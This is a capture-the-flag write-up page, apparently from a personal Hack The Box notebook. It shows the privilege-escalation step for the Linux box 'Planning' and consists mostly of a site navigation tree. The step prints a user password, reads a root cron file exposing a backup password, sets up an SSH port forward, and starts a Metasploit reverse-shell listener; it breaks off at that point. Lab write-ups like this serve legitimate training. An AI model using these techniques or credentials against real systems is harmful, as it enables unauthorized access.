Hack The Box
LinkedIn
  • Hack The Box
    • Windows Boxes
      • Mantis
        • Recon
          • nmap
        • Eumeration
          • 1337
          • 8080
          • 445
          • 88
          • 1433,50255
          • rpc
          • enum4linux
        • Foothold
          • Enumeration
          • james
        • Priv Esc
        • Credentials
      • Outdated
        • Recon
          • nmap
        • Eumeration
          • 445
          • 25
        • Foothold
        • Priv Esc
        • Credentials
      • Driver
        • Recon
          • nmap
        • Eumeration
          • 445
          • 80
        • Foothold
        • Priv Esc
        • Credentials
      • Remote
        • Recon
          • nmap
        • Eumeration
          • 21
          • 111
          • 80
        • Foothold
        • Priv Esc
        • Credentials
      • Forest
        • Recon
          • nmap
        • Enumeration
          • 88
          • 445
          • 389,135
        • Foothold
          • Enumeration
          • Priv Esc
      • Manager
        • Recon
          • nmap
        • Enumeration
          • 80
          • 1433
          • 445
          • 88
        • Foothold
          • Enumeration
          • Priv Esc
      • Hospital
        • Recon
          • nmap
        • Enumeration
          • 80
          • 8080
        • Foothold
          • Priv Esc (Web Server)
          • Pivot
          • Priv Esc (Windows)
      • Querier
        • Recon
          • nmap
        • Enumeration
          • 445
          • 1433
          • digging
        • Foothold
        • Enumeration
        • Priv Esc
      • Sauna
        • Recon
          • nmap
        • Eunmeration
          • 80
            • ffuf
          • 445
          • 88
        • Foothold
        • Eumeration
        • Priv Esc
          • svc_mgr
        • Credentials
      • Active
        • Recon
          • nmap
        • Eumeration
          • 445
          • 88
          • enum4linux
        • Foothold
          • Enumeration
        • Priv Esc
      • Resolute
        • Recon
          • nmap
        • Eumeration
          • enum4linux
          • 445
          • rpc
          • Page 3
        • Foothold
          • Enumeration
        • Priv Esc
          • ryan
          • nt authority\system
        • Users
      • Legacy
        • Recon
          • nmap
        • Eumeration
          • 445
          • enum4linux
          • Page 2
        • Foothold
          • Enumeration
        • Priv Esc
        • Credentials
      • Granny
        • Recon
          • nmap
        • Eumeration
          • 80
        • Foothold
          • Enumeration
        • Priv Esc
        • Credentials
      • Grandpa
        • Recon
          • nmap
        • Eumeration
          • 80
        • Foothold
          • Enumeration
        • Priv Esc
        • Credentials
      • Bounty
        • Recon
          • nmap
        • Eumeration
          • 80
          • Page 1
          • Page 2
        • Foothold
          • Enumeration
        • Priv Esc
        • Credentials
      • Cascade
        • Recon
          • nmap
        • Eumeration
          • Page
          • Page 1
          • Page 2
          • enum4linux
        • Foothold
          • Enumeration
        • Priv Esc
        • Credentials
      • Mailing
        • Recon
          • nmap
        • Eumeration
          • 80
        • Foothold
        • Priv Esc
        • Credentials
    • Linux Boxes
      • Cypher
        • Recon
          • nmap
        • Eumeration
          • 80
          • Page 1
          • Page 2
        • Foothold
        • Priv Esc
        • Credentials
      • Union
        • Recon
          • nmap
        • Eumeration
          • 80
        • Foothold
        • Priv Esc
        • Credentials
      • Trick
        • Recon
          • nmap
        • Eumeration
          • 53
          • 25
          • 80
        • Foothold
        • Priv Esc
        • Credentials
      • Shoppy
        • Recon
          • nmap
        • Eumeration
          • 80
          • 9093
        • Foothold
        • Priv Esc
        • Credentials
      • Delivery
        • Recon
          • nmap
        • Eumeration
          • 80
          • 8065
        • Foothold
        • Priv Esc
        • Credentials
      • MetaTwo
        • Recon
          • nmap
        • Eumeration
          • 21
          • 80
        • Foothold
        • Priv Esc
        • Credentials
      • Codify
        • Recon
          • nmap
        • Eumeration
          • 80
            • ffuf
          • 22
          • 3000
        • Foothold
        • Priv Esc
          • joshua
          • root
        • emails
      • Valentine
        • Recon
          • nmap
          • vuln
        • Eumeration
          • 80
          • 443
          • 22
        • Foothold
          • Enumeration
        • Priv Esc
        • Credentials
      • Headless
        • Recon
          • nmap
        • Eumeration
          • 5000
          • 22
        • Foothold
          • Enumeration
        • Priv Esc
        • Credentials
      • Bizness
        • Recon
          • nmap
        • Eumeration
          • 443,80
          • 22
        • Foothold
          • Enumeration
        • Priv Esc
        • Credentials
      • Devvortex
        • Recon
          • nmap
        • Eumeration
          • 80
          • 22
        • Foothold
          • Enumeration
          • logan
        • Priv Esc
        • Credentials
      • Boardlight
        • Recon
          • nmap
        • Eumeration
          • Page
          • Page 1
          • Page 2
        • Foothold
          • Enumeration
        • Priv Esc
        • Credentials
      • Planning
        • Recon
          • nmap
        • Eumeration
          • 22
          • 80
        • Foothold
        • Priv Esc
        • Credentials
      • Dog
        • Recon
          • nmap
        • Eumeration
          • 80
        • Foothold
        • Priv Esc
        • Credentials
    • OSCP like Boxes
      • Linux
        • Jarvis
          • Recon
            • nmap
          • Eumeration
            • 80
            • 64999
          • Foothold
            • Enumeration
          • Priv Esc
            • Pepper
            • root
          • Credentials
        • UpDown
          • Recon
            • nmap
          • Eumeration
            • 80
          • Foothold
          • Priv Esc
          • Credentials
        • SolidState
          • Recon
            • nmap
          • Eumeration
            • 80
            • 4555
            • Page 2
          • Foothold
            • Enumeration
          • Priv Esc
          • Credentials
        • Node
          • Recon
            • nmap
          • Eumeration
            • 3000
          • Foothold
          • Priv Esc
            • tom
            • root
          • Credentials
        • Busqueda
          • Recon
            • nmap
          • Eumeration
            • 80
          • Foothold
            • Enumeration
          • Priv Esc
          • Credentials
        • Sau
          • Recon
            • nmap
          • Eumeration
            • 80
            • 55555
          • Foothold
            • Enumeration
          • Priv Esc
          • Credentials
        • Keeper
          • Recon
            • nmap
          • Eumeration
            • 80
          • Foothold
            • Enumeration
          • Priv Esc
          • Credentials
        • Broker
          • Recon
            • nmap
          • Eumeration
            • 80
            • 61613 61616
          • Foothold
            • Enumeration
          • Priv Esc
          • Credentials
        • Pandora
          • Recon
            • nmap
          • Eumeration
            • 80
            • 161 [UDP]
          • Foothold
            • Enumeration
          • Priv esc
            • Matt
            • root
          • Credentials
        • Soccer
          • Recon
            • nmap
          • Eumeration
            • 80
            • 9091
            • Page 2
          • Foothold
            • Enumeration
          • Priv Esc
            • Player
            • root
          • Credentials
        • Sense
          • Recon
            • nmap
            • web services
          • Eumeration
            • 80,443
          • Foothold
            • Enumeration
          • Priv Esc
          • Credentials
        • Nibbles
          • Recon
            • nmap
          • Eumeration
            • 80
              • Dir busting
          • Foothold
          • Priv Esc
          • Credentials
        • Editorial
          • Recon
            • nmap
          • Eumeration
            • 80
          • Foothold
          • Priv Esc
          • Credentials
      • Windows
        • Intelligence
          • Recon
            • nmap
            • web
          • Eumeration
            • 80
            • Page 1
            • Page 2
          • Foothold
            • Enumeration
          • Priv Esc
          • Credentials
        • StreamIO
          • Recon
            • nmap
            • web 443
          • Eumeration
            • 80
            • 443
            • Page 4
          • Exploit Chain
            • SQL Injection
            • Loggin into application
            • Exploiting master.php (Foothold)
          • Priv Esc
            • nikk37
            • JDGODD
            • Administrator/Martin
          • Credentials + Users
        • Escape
          • Recon
            • nmap
          • Eumeration
            • 445
            • 1433
            • Page 2
          • Foothold
            • Enumeration
          • Priv Esc
            • Ryan.Cooper
            • Administrator
            • Silver Ticket - Alternate Route
          • Credentials
        • SecNotes
          • Recon
            • nmap
          • Eumeration
            • 80
            • 8808
          • Foothold
            • Enumeration
          • Priv Esc
          • Credentials
        • Jeeves
          • Recon
            • nmap
          • Eumeration
            • 80
            • 5000
          • Foothold
            • Enumeration
          • Priv Esc
          • Credentials
        • Return
          • Recon
            • nmap
          • Eumeration
            • 80
          • Foothold
          • Priv Esc
          • Credentials
        • Active
          • Recon
            • nmap
            • enum4linux
          • Eumeration
            • 445
          • Foothold
            • Enumeration
          • Priv Esc
          • Credentials
        • Love
          • Recon
            • nmap
          • Eumeration
            • 80
            • Page 1
            • Page 2
          • Foothold
            • Intended route
            • Enumeration
          • Priv Esc
          • Credentials
        • ServMon
          • Recon
            • nmap
          • Eumeration
            • 21
            • 80
            • 8443
            • 445
          • Foothold
            • Enumeration
          • Priv Esc
          • Credentials
        • Support
          • Recon
            • nmap
          • Eumeration
            • 445
            • 88 Kerberos
            • 389
          • Foothold
            • Enumeration
          • Priv Esc
          • Credentials
        • Sauna
          • Recon
            • nmap
          • Eumeration
            • 80
          • Foothold
            • Enumeration
          • Priv Esc
          • Credentials
        • Forest
          • Recon
            • nmap
          • Eumeration
            • Page
            • Page 1
            • Page 2
          • Foothold
            • Enumeration
          • Priv Esc
          • Credentials
        • Perfection
          • Recon
            • nmap
          • Eumeration
            • 80
          • Foothold
          • Priv Esc
          • Credentials
    • Pro Labs
      • Dante
    • Template
      • Recon
        • nmap
      • Eumeration
        • Page
        • Page 1
        • Page 2
      • Foothold
      • Priv Esc
      • Credentials
Powered by GitBook
On this page

Was this helpful?

  1. Hack The Box
  2. Linux Boxes
  3. Planning

Priv Esc

PreviousFootholdNextCredentials

Last updated 12 hours ago

Was this helpful?

enzo:RioTecRANDEntANT!
enzo@planning:~$ ls -l /opt
total 8
drwx--x--x 4 root root 4096 Feb 28 19:06 containerd
drwxr-xr-x 2 root root 4096 Jun  5 09:52 crontabs
enzo@planning:~$ ls -la /opt/containerd/
ls: cannot open directory '/opt/containerd/': Permission denied
enzo@planning:~$ ls -la /opt/crontabs/
total 12
drwxr-xr-x 2 root root 4096 Jun  5 09:52 .
drwxr-xr-x 4 root root 4096 Feb 28 19:21 ..
-rw-r--r-- 1 root root  737 Jun  7 04:00 crontab.db
enzo@planning:~$ cat /opt/crontabs/crontab.db
{"name":"Grafana backup","command":"/usr/bin/docker save root_grafana -o /var/backups/grafana.tar && /usr/bin/gzip /var/backups/grafana.tar && zip -P P4ssw0rdS0pRi0T3c /var/backups/grafana.tar.gz.zip /var/backups/grafana.tar.gz && rm /var/backups/grafana.tar.gz","schedule":"@daily","stopped":false,"timestamp":"Fri Feb 28 2025 20:36:23 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740774983276,"saved":false,"_id":"GTI22PpoJNtRKg0W"}
{"name":"Cleanup","command":"/root/scripts/cleanup.sh","schedule":"* * * * *","stopped":false,"timestamp":"Sat Mar 01 2025 17:15:09 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740849309992,"saved":false,"_id":"gNIRXh1WIc9K7BYX"}

Restart SSH session

❯ ssh enzo@10.10.11.68 -o EnableEscapeCommandline=yes

Port Forward

enzo@planning:~$
ssh> -L 9999:127.0.0.1:8000
Forwarding port.
❯ msfconsole -q -x 'use exploit/multi/handler;set LHOST tun0; set LPORT 443; run'
[*] Using configured payload generic/shell_reverse_tcp
LHOST => tun0
LPORT => 443
[*] Started reverse TCP handler on 10.10.14.3:443